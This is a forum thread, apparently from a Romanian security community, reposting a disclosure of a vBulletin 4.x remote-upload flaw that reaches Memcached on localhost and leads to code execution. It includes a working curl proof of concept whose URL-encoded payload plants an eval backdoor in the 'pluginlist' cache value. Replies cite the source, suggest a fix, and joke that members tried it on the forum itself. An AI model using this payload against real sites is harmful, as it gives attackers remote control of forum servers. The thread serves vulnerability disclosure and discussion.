iulik Posted August 18, 2015 Report Posted August 18, 2015 vBulletin's memcache setting is vulnerable in certain versions(allbefore 4.2.2) to an RCE. vBulletin seem to have refused to classify itas a vulnerability or post anything about it, or put anything in theannouncements on their website. They say "PL2 (4.2.2) should prevent theuse of localhost," however that doesn't help people using previousversions(which they appear to support with patches, still.)They also haven't updated previous versions of vBulletin for this bug,despite it being reported that it works on versions prior to 4.2.2.Of course though, the most important thing is, they haven't announcedthere even is/was a vulnerability in any version.Anyways, here it is:Remote Upload allows to send arbitrary data to loopback-only services, possibly allowing the execution of arbitrary code Exists in vB4The remote upload as implemented by the vB_Upload_* classes and vB_vURL (at least in vB 4.2.x, most probably earlier releases are also affected, and vB 5 might be affected as well) does not restrict the destination ports and hosts for remote uploads. This allows an attacker to abuse the function to as a proxy commit TCP port scans on other hosts. Much worse, it also allows to connect to local loopback-only services or to services only exposed on an internal network.On a setup running e.g. Memcached in default configuration (bound to localhost:11211, no authentication), the latter can be exploited to execute arbitrary code by forging a request to memcached, updating the `pluginlist` value.Proof-of-Concept using cURL:—$ curl 'http://sandbox.example.com/vb42/profile.php?do=updateprofilepic' -H 'Cookie: bb_userid=2; bb_password=926944640049f505370a38250f22ae57' --data 'do=updateprofilepic&securitytoken=1384776835-db8ce45ef28d8e2fcc1796b012f0c9ca1cf49e38&avatarurl=http://localhost:11211/%0D%0Aset%20pluginlist%200%200%2096%0D%0Aa%3A1%3A%7Bs%3A12%3A%22global_start%22%3Bs%3A62%3A%22if%28isset%28%24_REQUEST%5B%27eval%27%5D%29%29%7Beval%28%24_REQUEST%5B%27eval%27%5D%29%3Bdie%28%29%3B%7D%0D%0A%22%3B%7D%0D%0Aquit%0D%0A.png'—This leads to vBulletin opening a connection to the Memcached (localhost:11211) and sending the following data:—HEAD /set pluginlist 0 0 96a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();}";}quit.png HTTP/1.0Host: localhostUser-Agent: vBulletin via PHPConnection: close—This will cause the Memcached to update the `pluginlist` to contain the malicious code.Furthermore, the remote upload happily follows all kinds of redirects if provided with an appropriate Location header. Quote
QuoVadis Posted August 18, 2015 Report Posted August 18, 2015 @ManutaDeAur - daca dai copy-paste baga macar si sursa (SecurityFocus sau https://www.exploit-db.com/exploits/37815/) Quote
SirGod Posted August 18, 2015 Report Posted August 18, 2015 Pune validare ca avatarurl sa fie un URL valid sau poti face strip la localhost (plus variante). Oricum functioneaza doar daca se foloseste Memcached. Quote
Nytro Posted August 18, 2015 Report Posted August 18, 2015 Stiu si de vulnerabilitate (sunt abonat pe full disclosure) si ca nu se aplica la noi. Voiam doar sa fac lumea sa incerce pe RST Quote
Byte-ul Posted August 18, 2015 Report Posted August 18, 2015 Stiu si de vulnerabilitate (sunt abonat pe full disclosure) si ca nu se aplica la noi. Voiam doar sa fac lumea sa incerce pe RST haha, pai e bine ca incearca lumea sa testeze. (am incercat si eu, oh well) Quote
iulik Posted August 19, 2015 Author Report Posted August 19, 2015 @ManutaDeAur - daca dai copy-paste baga macar si sursa (SecurityFocus sau https://www.exploit-db.com/exploits/37815/)Vezi sa nu faci cu inima ca nu am pus sursa. Quote